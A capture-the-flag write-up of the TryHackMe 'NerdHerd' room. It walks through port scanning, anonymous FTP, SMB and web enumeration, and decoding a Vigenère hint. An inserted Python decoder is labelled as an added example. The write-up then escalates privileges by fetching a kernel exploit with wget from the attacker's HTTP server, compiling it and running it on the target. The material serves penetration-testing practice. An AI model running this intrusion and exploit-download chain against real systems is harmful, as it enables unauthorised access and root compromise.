NerdHerd — TryHackMe — Writeup

Hello. I’m Rahmos. Here is my NerdHerd — TryHackMe — Writeup. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -p- -v <ip>

So there are 5 open ports: 21 (FTP), 22 (SSH), 139 and 445 (SMB), 1337 (HTTP).

As FTP allows anonymous login, let’s log in and get the files inside:

ftp <ip>

I found an image and a txt file inside .jokesonyou. Get all the files using the mget command.

Let’s see the content of the txt file:

Read metadata of the image:

exiftool youfoundme.png

The owner name seems very suspicious. Let’s google this name. I found this link:

In order to decrypt this cipher, I need the “key”.

I will find the key later. “leet” is “1337”, which is the http port. So let’s access its website:

Well, looks like it was hacked by XSS. Press “OK”:

View page source (Ctrl+U):

So it’s not XSS, but just a function. Let’s see the youtube link:

It’s a song called “Surfin Bird”. Look at its lyrics:

The word “bird” is repeated many times. Maybe it’s the key to decrypt the cipher text above? Let’s try:

YES it is! But it’s not fully decoded. What about birdistheworld?

Finally it’s fully decoded! Now I’ve got another hint.
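As an added example (not part of the original writeup), here is a small Vigenère decoder that shows why “bird” only partly decodes a message enciphered with “birdistheworld”: the two keys agree on their first four letters, so the first four letters come out right and the rest drift. The ciphertext below is constructed by enciphering a made-up plaintext; it is not the text from the image metadata.

```python
# Added example, not from the original writeup: a Vigenère encoder/decoder used to
# show why a short key ("bird") only partially decodes text enciphered with the
# full key ("birdistheworld"). The ciphertext is constructed here, not taken
# from the box.

def _shift(ch, k, sign):
    """Shift one letter by key letter k; non-letters pass through unchanged."""
    if not ch.isalpha():
        return ch
    base = ord("A") if ch.isupper() else ord("a")
    offset = ord(k.lower()) - ord("a")
    return chr((ord(ch) - base + sign * offset) % 26 + base)

def vigenere(text, key, decrypt=False):
    """Encrypt (or decrypt) text with key; only letters consume key positions."""
    key = "".join(c for c in key if c.isalpha())
    if not key:
        raise ValueError("key must contain at least one letter")
    out, i = [], 0
    for ch in text:
        if ch.isalpha():
            out.append(_shift(ch, key[i % len(key)], -1 if decrypt else 1))
            i += 1
        else:
            out.append(ch)
    return "".join(out)

def matching_prefix_len(a, b):
    """Number of leading characters on which two strings agree."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n

# Constructed sample: a made-up plaintext enciphered with the full key.
PLAINTEXT = "the nerd herd hid the flag in the classified share"
FULL_KEY = "birdistheworld"
PARTIAL_KEY = "bird"
CIPHERTEXT = vigenere(PLAINTEXT, FULL_KEY)

if __name__ == "__main__":
    for key in (PARTIAL_KEY, FULL_KEY):
        guess = vigenere(CIPHERTEXT, key, decrypt=True)
        print(f"key={key!r:18} -> {guess}")
```

With the partial key only “the n” (the first four letters) decodes correctly; the full key recovers the whole sentence.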

Now I’ll scan for hidden dirs using gobuster:

gobuster dir -u http://<ip>:1337 -w /path-to-wordlist

Access /admin:

Again, page source:

Decode this string from Base64; you can use this link:

Well, I can only decode the username; the password is in an invalid format.

Up to now, the hints I’ve known are:

- easypass
- cibartowski
- hehegou<.jÇ].[ÝD

Now let’s see which folder is shared on SMB:

smbclient -L //<ip>

A folder named “nerdherd_classified” is shared. Let’s try to access it:

smbclient //<ip>/nerdherd_classified

However, I cannot access it right now. Next, I’ll use a script called “enum4linux” to enumerate more on this machine:

enum4linux <ip>

I’ve found another username: chuck

Let’s try to log in to SMB as chuck:

smbclient //<ip>/nerdherd_classified -U chuck

So chuck is the real username! Now what I need to find is chuck’s password. Let’s try all the hints above. I found the password.

Move around to view files:

Get the txt file and view its content:

Access the hidden dir:

View creds.txt:

Now I’ve got the ssh credential. Login to ssh as chuck:

And I’m in! Get the 1st flag:

Now I’ll find a way to own root and get the 2nd flag. First, let’s search for SUID binaries with the find command:

find / -perm -u=s 2>/dev/null

Well, nothing useful. Next, try sudo -l to see if chuck can run sudo:

Chuck cannot run sudo either.

Check kernel version: uname -a

It’s from 2016, which means it’s really old. Looking on Google for an exploit, I found this link. It’s written in C, and gcc exists on the target machine:

So, let’s transfer this exploit to the machine, compile and run it! Start an HTTP server on your machine:

python3 -m http.server 9000

Then from the target machine:

wget http://<ip>:9000/exploit.c

The exploit code has been transferred. Compile using gcc:

gcc exploit.c -o exploit

Then execute:

chmod +x exploit

./exploit

Now I’m root! Let’s get the 2nd flag:

Wait, it’s not the flag! I will find all .txt files that are owned by root:

find / -name "*.txt" -user root 2>/dev/null

Well it’s in /opt. Get the flag!

Now it’s time for the final flag. Look at the hint: it’s something about “memories”. So maybe it’s about history? Let’s read the .bash_history inside the root folder:

The end.

HAPPY HACKING

I’m Groot